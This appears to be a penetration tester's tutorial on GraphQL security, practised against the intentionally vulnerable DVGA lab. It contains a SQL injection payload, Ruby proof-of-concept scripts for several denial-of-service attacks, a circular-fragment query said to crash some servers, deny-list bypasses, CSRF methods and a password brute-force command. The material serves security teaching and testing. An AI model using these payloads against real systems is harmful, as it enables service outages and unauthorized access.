Before attacking GraphQL hands-on, we need to understand what it is and how it works. That’s what we’ll see in the What is GraphQL? section.
Then, I’ll introduce Security considerations and give a glimpse of how some features can be abused.
Next, I’ll showcase several GraphQL vulnerabilities and attacks, how they work and how to exploit them as well as illustrations with POCs.
Finally, I’ll present a few offensive tools.
What is GraphQL?
Quick history
- Facebook started developing GraphQL in 2012
- Facebook publicly released GraphQL in 2015
- The GraphQL Foundation, hosted by the Linux Foundation, was formed on 7 November 2018
Goals
GraphQL is a query language for APIs and a runtime engine that executes those queries.
It’s an alternative to API styles such as REST, SOAP or gRPC. It’s not an absolute replacement: in some cases GraphQL is better suited, in others REST or gRPC are. They can also coexist, and GraphQL can even be used on top of another API as an abstraction layer.
GraphQL doesn’t replace:
- graph databases (Neo4j, ArangoDB, OrientDB)
- query languages (SQL, NoSQL)
- object-relational mapping (ORM) (Hibernate, CodeIgniter, SQLAlchemy, ActiveRecord)
- state management libraries (Redux, Recoil, BLoC, Riverpod)
Key information
GraphQL is available for all major languages: the official website lists implementations for JavaScript, Go, PHP, Java / Kotlin, C# / .NET, Python, Swift / Objective-C, Rust, Ruby, Elixir, Scala, Flutter, Clojure, Haskell, C / C++, Elm, OCaml / Reason, Erlang, Julia, R, Groovy, Perl, D, Ballerina.
Query result is returned in JSON.
It is both a query language and server-side API runtime.
Core concepts
- Only ask for what you need
- Get predictable results
- Get many resources in a single request
- Organized in terms of types and fields, not endpoints
- Add new fields and types to a GraphQL API without impacting existing queries
- Not limited by a specific storage engine
- Real-time ready
Examples
Data description
type Project {
name: String
tagline: String
contributors: [User]
}
Query
{
project(name: "GraphQL") {
tagline
}
}
One can think of it as:
SELECT tagline FROM project WHERE name = 'GraphQL'
Answer
{
"project": {
"tagline": "A query language for APIs"
}
}
Only what you need
One only needs the hero’s name?
{
hero {
name
}
}
Just get the hero’s name.
{
"hero": {
"name": "Luke Skywalker"
}
}
One needs the hero’s name and height?
{
hero {
name
height
}
}
Get exactly that.
{
"hero": {
"name": "Luke Skywalker",
"height": 1.72
}
}
With a REST API, one would probably have queried an endpoint that always returns the same fields, ending up with either too much data or not enough.
GET /hero/0
{
"name": "Luke Skywalker",
"height": 1.72,
"mass": 77,
"address": "Galaxy du Centaure"
}
Many resources in a single request
It’s possible to query the data belonging to the user, the associated posts, and its followers in the same request.
query {
User(id: 1337) {
name
posts {
title
}
followers(last: 3) {
name
}
}
}
{
"data": {
"User": {
"name": "noraj",
"posts": [
{ "title": "From cookie flag to DA" },
{ "title": "Why you shouldn't disable IPv6" }
],
"followers": [
{ "name": "Alice" },
{ "name": "Bob" },
{ "name": "Carole" }
]
}
}
}
With REST, we would probably have to make three requests.
REST query n°1 to get user information.
GET /users/1337
{
"user": {
"id": 1337,
"name": "noraj",
"address": {...},
"birthday": "30/02/1979"
}
}
REST query n°2 to get user’s posts.
GET /users/1337/posts
{
"posts": [{
"id": 5542,
"title": "From cookie flag to DA",
"content": "...",
"comments": [...]
}, {
"id": 5543,
"title": "Why you shouldn't disable IPv6",
"content": "...",
"comments": [...]
}]
}
REST query n°3 to get user’s followers.
GET /users/1337/followers
{
"followers": [{
"id": 1338,
"name": "Alice",
"address": {...},
"birthday": "01/05/1979"
},{
"id": 1339,
"name": "Bob",
"address": {...},
"birthday": "15/07/1978"
},{...}]
}
In this case, usage of GraphQL over REST is optimal.
- With REST:
- 3 queries
- too much data
- With GraphQL:
- 1 query
- exact data
Security considerations
DVGA
To practice the following examples, deploy DVGA – Damn Vulnerable GraphQL Application, found on OWASP VWAD, which is an intentionally vulnerable application implementing many GraphQL vulnerabilities.
Installation steps:
$ git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git dvga && cd dvga
$ docker build -t dvga .
$ docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga
We can define a custom local domain.
$ cat /etc/hosts | grep .test
127.0.0.2 noraj.test
In order to verify the application is running correctly, let’s make an HTTP request to the GraphQL endpoint: curl http://noraj.test:5013/graphql
Now let’s put the Escape Pentesting GraphQL 101 series into practice.
Reconnaissance / Discovery
Doing some initial discovery steps allows:
- Understanding the limits enforced
- Determining the verbosity
- Fetching all the information possible about the architecture
Before we start: Resources
It’s advised to install a GraphQL client to ease interaction with the endpoint. The following websites are worth consulting or bookmarking for later use, to search for tools and resources related to GraphQL security.
- GraphQL IDE / Client:
- https://inventory.raw.pm/ + graphql
- Awesome (list) GraphQL Security
1st query / most basic operation
A very simple query is to ask for __typename: the answer reflects the type of operation being performed.
For example, for a Query:
query {
__typename
}
{
"data": {
"__typename": "Query"
}
}
For a Mutation:
mutation {
__typename
}
{
"data": {
"__typename": "Mutations"
}
}
Note: a GraphQL mutation is roughly the equivalent of the POST, PUT, PATCH and DELETE methods in REST: it is used to create, update or delete content.
Aliases
It’s possible to use aliases either to get a custom key name in the answer or to request the same field several times.
query {
title1: __typename
title2: __typename
title3: __typename
title4: __typename
title5: __typename
}
{
"data": {
"title1": "Query",
"title2": "Query",
"title3": "Query",
"title4": "Query",
"title5": "Query"
}
}
But for discovery it has other usages:
- Many aliases to detect an alias limit
- A very long alias name to detect a character limit
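The two probes above are tedious to write by hand, so here is a minimal Ruby sketch that generates them. The helper names (alias_probe, long_alias_probe) and the alias prefix are my own choices for illustration; the script only builds the JSON bodies, sending them is left to whatever HTTP client is at hand.

```ruby
require 'json'

# Build a query repeating the harmless __typename field under `count`
# distinct aliases (a1, a2, ...). `alias_prefix` is an arbitrary choice.
def alias_probe(count, alias_prefix: 'a')
  fields = (1..count).map { |i| "#{alias_prefix}#{i}: __typename" }
  "query { #{fields.join(' ')} }"
end

# Build a query with a single alias made of `length` characters.
def long_alias_probe(length)
  "query { #{'a' * length}: __typename }"
end

# JSON bodies ready to be POSTed to the endpoint.
[10, 100, 1000].each do |count|
  body = JSON.generate('query' => alias_probe(count))
  puts "#{count} aliases -> #{body.bytesize} bytes"
end
```

Increasing the count or the length until the server starts answering with an error gives a rough idea of the limits enforced.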
Detect verbosity
We can trigger an error on purpose to detect the error verbosity of the engine.
query {
noraj
}
{
"errors": [
{
"message": "Cannot query field \"noraj\" on type \"Query\".",
"locations": [
{
"line": 2,
"column": 3
}
]
}
]
}
Introspection
gRPC servers can have reflection enabled, which allows listing the services and retrieving their definitions.
E.g. with grpcurl:
# Server supports reflection
grpcurl localhost:8787 list
GraphQL has no dedicated magic endpoint that returns the whole schema in one shot, but it has a similar feature called introspection, which returns more or less of the schema depending on how detailed the query is.
Note: introspection may be enabled or disabled by default depending on the engine.
Here is a minimal example:
{
__schema {
queryType {
fields {
name
}
}
}
}
It’s possible to craft a more complex query to dump a near-complete schema.
Several "full" introspection queries exist to retrieve all queries, mutations, fields, etc., including one compatible with GraphQL Voyager.
Such a complete answer is nice to have, but it is far too long to be read manually.
Fortunately, tools such as GraphQL Voyager or GraphQL Visualizer display the schema as a graph, which is friendlier to the human brain.
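When a graph is overkill, the answer to the minimal introspection query can also be processed with a few lines of Ruby. This is only a sketch: the response below is a hypothetical, shortened one that reuses field names from the DVGA examples of this article, and query_field_names is a helper name of my own.

```ruby
require 'json'

# Hypothetical, shortened response to the minimal introspection query.
SAMPLE_RESPONSE = <<~JSON
  {
    "data": {
      "__schema": {
        "queryType": {
          "fields": [
            { "name": "pastes" },
            { "name": "paste" },
            { "name": "systemUpdate" },
            { "name": "systemHealth" }
          ]
        }
      }
    }
  }
JSON

# Return the names of the top-level query fields, or an empty list when
# the expected keys are missing (e.g. introspection is disabled).
def query_field_names(raw_json)
  fields = JSON.parse(raw_json).dig('data', '__schema', 'queryType', 'fields')
  (fields || []).map { |field| field['name'] }
end

puts query_field_names(SAMPLE_RESPONSE)
```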
Field suggestion
But a basic security measure is to disable introspection, so how can the schema be retrieved when it is disabled?
In that case, it’s possible to abuse error suggestions: the "did you mean" messages.
In case of error, most engines will try to suggest the correct field based on the user input.
query {
past
}
{
"errors": [
{
"message": "Cannot query field \"past\" on type \"Query\". Did you mean \"paste\" or \"pastes\"?",
"locations": [
{
"line": 3,
"column": 2
}
]
}
]
}
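Harvesting those suggestions boils down to a bit of text parsing. The following Ruby sketch assumes the "Did you mean ... ?" wording shown in the error above (other engines may phrase it differently); suggested_fields and SUGGESTION_RESPONSE are names I made up for the example.

```ruby
require 'json'

# Error response copied from the example above (locations omitted).
SUGGESTION_RESPONSE = <<~'JSON'
  {
    "errors": [
      { "message": "Cannot query field \"past\" on type \"Query\". Did you mean \"paste\" or \"pastes\"?" }
    ]
  }
JSON

# Extract every field name quoted after "Did you mean" in the error messages.
def suggested_fields(raw_json)
  errors = JSON.parse(raw_json).fetch('errors', [])
  errors.flat_map do |error|
    hint = error['message'].to_s[/Did you mean (.+)\?/, 1]
    hint ? hint.scan(/"([^"]+)"/).flatten : []
  end.uniq
end

puts suggested_fields(SUGGESTION_RESPONSE)
```

Looping over a wordlist, sending each word as a field and collecting the suggestions is the brute-force idea in a nutshell.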
Clairvoyance automates the extraction of a partial schema by brute-forcing field names and abusing field suggestions.
# Default run, using the wordlist shipped with clairvoyance (~10k entries):
# /usr/lib/python3.10/site-packages/clairvoyance/wordlist.txt
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql
# /usr/share/seclists/Miscellaneous/lang-english.txt is too heavy (~350k entries)
# english-words is ~5k entries
sudo -E wordlistctl fetch -d english-words
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
-w /usr/share/wordlists/misc/english-words.10.txt
# /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
# is ~38k entries and full of garbage
# else build a custom wordlist
Finding paths
graphql-path-enum lists the different ways of reaching a given type in a GraphQL schema. It can reveal an indirect path to an object, which helps bypass restrictions.
$ graphql-path-enum -i /tmp/introspection-response.json -t OwnerObject
Found 3 ways to reach the "OwnerObject" node:
- Query (pastes) -> PasteObject (owner) -> OwnerObject
- Query (paste) -> PasteObject (owner) -> OwnerObject
- Query (readAndBurn) -> PasteObject (owner) -> OwnerObject
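The idea behind such an enumeration is a plain graph traversal. Here is a minimal Ruby sketch of it, not the tool's actual implementation: the SCHEMA hash is a hypothetical, hand-simplified model (type name => field name => returned type) inspired by the output above, whereas the real tool works on a full introspection response.

```ruby
# Hypothetical, simplified schema: type name => { field name => returned type }.
SCHEMA = {
  'Query' => { 'pastes' => 'PasteObject', 'paste' => 'PasteObject',
               'readAndBurn' => 'PasteObject', 'systemHealth' => 'String' },
  'PasteObject' => { 'owner' => 'OwnerObject', 'title' => 'String' },
  'OwnerObject' => { 'pastes' => 'PasteObject', 'name' => 'String' }
}.freeze

# Depth-first search listing every cycle-free path from `from` to `target`.
def paths_to(target, from: 'Query', schema: SCHEMA, visited: [from])
  schema.fetch(from, {}).flat_map do |field, type|
    step = "#{from} (#{field})"
    if type == target
      [[step, target]]
    elsif visited.include?(type)
      [] # already on the current path: do not loop forever
    else
      paths_to(target, from: type, schema: schema, visited: visited + [type])
        .map { |rest| [step, *rest] }
    end
  end
end

paths_to('OwnerObject').each { |path| puts path.join(' -> ') }
```

The visited list is what keeps the traversal from looping on circular references such as PasteObject -> OwnerObject -> PasteObject.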
Fingerprinting
Often the GraphQL endpoint will be /graphql or /v1/graphql. It’s generally not hard to find, but otherwise it’s possible to try detecting the endpoint with graphw00f.
$ graphw00f -d -t http://noraj.test:5013
[*] Checking http://noraj.test:5013/
[*] Checking http://noraj.test:5013/graphql
[!] Found GraphQL at http://noraj.test:5013/graphql
Identifying the GraphQL engine:
$ graphw00f -f -t http://noraj.test:5013/graphql
[*] Checking if GraphQL is available at http://noraj.test:5013/graphql...
[!] Found GraphQL.
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Graphene)
[!] Attack Surface Matrix: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/graphene.md
[!] Technologies: Python
[!] Homepage: https://graphene-python.org
[*] Completed.
Here graphw00f identified the Graphene engine.
Vulnerabilities
Multipath Evaluation
As an example, imagine a schema in which access to the character object has to be blocked.
Five locations then have to be blocked:
- character query
- characters query
- results field of the characters object
- resident field of the Location object
- characters field of the Episode object
This is error-prone: if a single location is forgotten, the object remains reachable.
For example, on a website, one is not authorized to view other users’ info (client object) but can access the client field of the comments object. This allows an authorization bypass.
SQL injection
GraphQL APIs often fetch data from a database.
Where to inject in order to detect a SQLi?
The only injectable inputs are arguments (passed inline or through variables). One can think of them as the values of a SQL WHERE clause.
query {
user(name: "' or 1=1 --") {
id
email
}
}
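To see why such an argument is dangerous, here is a hedged Ruby sketch of what a careless resolver might do behind user(name: ...). The users table, its columns and both helper names are hypothetical; nothing here is taken from a real application.

```ruby
# Hypothetical resolver code: the argument is pasted straight into the
# SQL text, so it can change the structure of the statement.
def vulnerable_sql(name)
  "SELECT id, email FROM users WHERE name = '#{name}'"
end

# Safer variant: the statement keeps a placeholder and the value travels
# separately, to be bound by the database driver.
def parameterized_sql(name)
  ['SELECT id, email FROM users WHERE name = ?', [name]]
end

payload = "' or 1=1 --"
puts vulnerable_sql(payload)
# SELECT id, email FROM users WHERE name = '' or 1=1 --'
p parameterized_sql(payload)
```

In the first case the quote closes the string literal and the rest of the payload becomes SQL; in the second case the payload stays a plain value.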
Denial of Service – Batch Query Attack (JSON array)
- Find a query that takes a long time to execute
- Batch it!
GraphQL query:
{
systemUpdate
}
For example, in DVGA, systemUpdate takes about 30 seconds to execute.
HTTP request:
POST /graphql HTTP/1.1
...
Content-Type: application/json

{"query":"{\n\tsystemUpdate\n}"}
The concept is to send several queries in the same request.
Most GraphQL clients don’t support batch queries: they often let the user select which query to run but won’t send several of them in the same HTTP JSON body. So one has to craft the HTTP request oneself.
Ruby PoC for batch querying:
require 'httpx'
data = Array.new(3) {
{ 'query' => 'query { systemUpdate }'}
}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
The PoC:
- queries systemUpdate 3 times
- sends the request through the proxy for Burp logging
- extends the timeout (default 60 sec) because systemUpdate takes ~32 sec and the PoC queries it 3 times, so the request takes about 3 × 32 ≈ 96 sec
The HTTP request body will look like:
[
{
"query": "query { systemUpdate }"
},
{
"query": "query { systemUpdate }"
},
{
"query": "query { systemUpdate }"
}
]
Denial of Service – Deep recursion query attack
This attack is possible when there is a circular reference.
The paste object can have an owner field and the owner object can have a paste field. The idea is just to nest them deeply.
Writing the query by hand quickly becomes laborious, so scripting it is highly valuable.
Ruby PoC for deep recursion:
require 'httpx'
nesting_level = 10
recursion_pattern = 'pastes{owner{'
fields = 'name'
payload = recursion_pattern * nesting_level + fields + '}}' * nesting_level
data = { 'query' => "query{#{payload}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
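To get a feel for what the PoC above sends, the payload construction can be isolated in a small function and printed for a low nesting level. This is just a sketch reusing the same pattern; deep_query is a name I chose for the example and nothing is sent over the network.

```ruby
# Build the nested query used by the PoC for a given nesting level.
def deep_query(nesting_level, pattern: 'pastes{owner{', fields: 'name')
  # Each repetition of the pattern opens two braces, hence '}}' to close it.
  payload = pattern * nesting_level + fields + '}}' * nesting_level
  "query{#{payload}}"
end

puts deep_query(2)
# query{pastes{owner{pastes{owner{name}}}}}

# The query text grows linearly with the nesting level, while the amount
# of work done by the server depends on how many objects each level returns.
[10, 100, 1000].each do |level|
  puts "level #{level}: #{deep_query(level).bytesize} bytes"
end
```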
Denial of Service – Field duplication attack
As the title suggests, the attack concept is to duplicate many times the same field.
query {
pastes {
ipAddr # 1
ipAddr # 2
# ...
ipAddr # 1000
}
}
Unlike the two previous attacks, this one doesn’t consume time exponentially, so several thousand fields are required to make the server hang significantly.
Ruby PoC for field duplication:
require 'httpx'
copy_level = 6000
copy_pattern = 'ipAddr,'
payload = copy_pattern * copy_level
data = { 'query' => "query{pastes{#{payload}}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
Denial of Service – Query aliases duplication attack
It’s an alternative to the batch query attack when batching is disabled or not supported by the engine. Instead of creating several queries calling the same method, it uses only one query but relies on aliases to call the same method several times.
query {
q1: systemUpdate
q2: systemUpdate
q3: systemUpdate
}
Ruby PoC for query aliases duplication:
require 'httpx'
copy_level = 3
query = 'systemUpdate'
payload = (1..copy_level).map { |i| "q#{i}:#{query}" }.join(',')
data = { 'query' => "query{#{payload}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
Denial of Service – Circular fragments attack
The spread operator (...) allows reusing fragments. It’s like a mixin.
Example of legitimate use:
fragment smallPaste on PasteObject {
id
title
content
}
query allPastes {
pastes {
...smallPaste
}
}
query allPastesWithStatus {
pastes {
public
...smallPaste
}
}
It’s easy to create an infinite loop by having two fragments call each other.
fragment noraj on PasteObject {
title
content
...jaron
}
fragment jaron on PasteObject {
content
title
...noraj
}
query {
...noraj
}
PS: the query may not even be needed.
Warning: this is the most effective technique, so use it with caution during audits: on some engines it makes the server crash instantly.
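Detecting such a loop before executing anything is a classic cycle search in a graph. The Ruby sketch below illustrates the idea under strong assumptions: it parses the document with regular expressions, so it only understands flat fragments like the ones above (no nested selection sets), whereas a real engine would validate the parsed AST. All helper names are mine.

```ruby
# Map each fragment name to the names of the fragments it spreads.
# Inline fragments ("... on Type") are ignored.
def fragment_spreads(document)
  document.scan(/fragment\s+(\w+)\s+on\s+\w+\s*\{([^}]*)\}/).to_h do |name, body|
    [name, body.scan(/\.\.\.\s*(?!on\b)(\w+)/).flatten]
  end
end

# True when following spreads from `name` leads back to a fragment that is
# already on the current path.
def cycle_from?(graph, name, path = [])
  return true if path.include?(name)

  graph.fetch(name, []).any? { |child| cycle_from?(graph, child, path + [name]) }
end

def circular_fragments?(document)
  graph = fragment_spreads(document)
  graph.keys.any? { |name| cycle_from?(graph, name) }
end

CIRCULAR = <<~GRAPHQL
  fragment noraj on PasteObject {
    title
    content
    ...jaron
  }
  fragment jaron on PasteObject {
    content
    title
    ...noraj
  }
GRAPHQL

puts circular_fragments?(CIRCULAR)
```

An engine that performs this kind of check during validation rejects the document instead of recursing until it crashes.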
Query whitelist/blacklist bypass
Take the following direct query to systemHealth:
query {
systemHealth
}
This query is protected and reserved for privileged users.
{
"errors": [
{
"message": "400 Bad Request: Query is on the Deny List.",
"locations": [
{
"line": 2,
"column": 2
}
],
"path": [
"systemHealth"
]
}
],
"data": {
"systemHealth": null
}
}
Sometimes just using a query with a different operation name can work.
query random {
systemHealth
}
If not, a similar error is returned:
{
"errors": [
{
"message": "400 Bad Request: Operation Name \"random\" is not allowed.",
"locations": [
{
"line": 2,
"column": 2
}
],
"path": [
"systemHealth"
]
}
],
"data": {
"systemHealth": null
}
}
This technique allows bypassing blacklists but not whitelists.
To bypass a (poorly written) whitelist, use a query with an allowed operation name:
query getPastes {
systemHealth
}
{
"data": {
"systemHealth": "System Load: 2.54\n"
}
}
In some cases, a simple alias is also enough to bypass filters.
query {
bypass: systemHealth
}
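Why do these tricks work? A plausible explanation is that the filter looks at the wrong thing. The Ruby sketch below is purely hypothetical (it is not DVGA's code): a naive filter trusts the operation name chosen by the client, while a stricter one looks at the fields really selected. Both rely on regular expressions and only handle flat queries with simple aliases.

```ruby
# Hypothetical lists, made up for the example.
ALLOWED_OPERATIONS = %w[getPastes].freeze
DENIED_FIELDS = %w[systemHealth].freeze

# Naive filter: trusts the client-chosen operation name and never inspects
# the selected fields.
def naive_filter_allows?(query)
  operation_name = query[/\A\s*(?:query|mutation)\s+(\w+)/, 1]
  ALLOWED_OPERATIONS.include?(operation_name)
end

# Names of the top-level fields, aliases stripped.
def top_level_fields(query)
  body = query[/\{(.*)\}/m, 1].to_s
  body.scan(/(?:\w+\s*:\s*)?(\w+)/).flatten
end

# Stricter filter: decides on the selected fields, whatever the operation
# name or the alias.
def field_filter_allows?(query)
  (top_level_fields(query) & DENIED_FIELDS).empty?
end

[
  'query { systemHealth }',
  'query getPastes { systemHealth }',
  'query { bypass: systemHealth }'
].each do |query|
  puts "#{query} naive=#{naive_filter_allows?(query)} strict=#{field_filter_allows?(query)}"
end
```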
CSRF – POST-based
A common misconception is that JSON-based APIs are not vulnerable to CSRF.
In fact, the attack works all the same.
Create a classic CSRF form, convert the form data to JSON at submit time with JavaScript, and use application/json as the content type, as it’s probably the only Content-Type accepted by the GraphQL engine. Occasionally, due to middleware, some endpoints accept application/x-www-form-urlencoded as well.
Another option is to prepare a full JSON query in JavaScript and auto-submit it with fetch() or XHR.
Note: of course, CSRF is mostly useful against mutations.
CSRF – GET-based
A misconfigured GraphiQL can authorize mutations over GET requests, so the CSRF is as easy as URL-encoding the whole query and putting the URL in an image or an iframe.
As queries are normally not state-changing, they are often authorized over GET. If a state-changing GraphQL operation is wrongly implemented as a query instead of a mutation, it can therefore be triggered over GET.
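Building such a URL takes a couple of lines of Ruby with the standard library. In this sketch, csrf_get_url is a helper name of my own, the mutation and its arguments are placeholders, and whether the target actually accepts the query parameter over GET has to be verified on each endpoint.

```ruby
require 'uri'

# Build a GET URL carrying a GraphQL document in the `query` parameter.
def csrf_get_url(endpoint, graphql_document)
  uri = URI(endpoint)
  uri.query = URI.encode_www_form(query: graphql_document)
  uri.to_s
end

# Placeholder mutation: name and arguments are assumptions for the example.
mutation = 'mutation { createPaste(title: "csrf", content: "pwned") { paste { id } } }'
url = csrf_get_url('http://noraj.test:5013/graphql', mutation)

# HTML snippet to host on the attacker's page.
puts %(<img src="#{url}">)
```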
Tools
graphql-cop is a GraphQL vulnerability scanner.
CrackQL is a GraphQL password brute-force and fuzzing utility with the following features:
- Defense evasion: evades traditional API HTTP rate-limit and query cost analysis defenses
- Generic fuzzing (intruder like but benefits from defense evasion)
mutation {
login(username: {{username|str}}, password: {{password|str}}) {
accessToken
}
}
crackql -t http://noraj.test:5013/graphql -q login.graphql -i usernames_and_passwords.csv
GraphQLmap is a scripting engine to interact with a GraphQL endpoint notably for:
- field fuzzing
- NoSQLi / SQLi
GraphQL Threat Matrix is a resource that lists the differences in how GraphQL implementations interpret and conform to the GraphQL specification.
InQL is a CLI tool and Burp extension for GraphQL.
About the author
Article written by Alexandre ZANNI aka noraj, Penetration Testing Engineer at ACCEIS.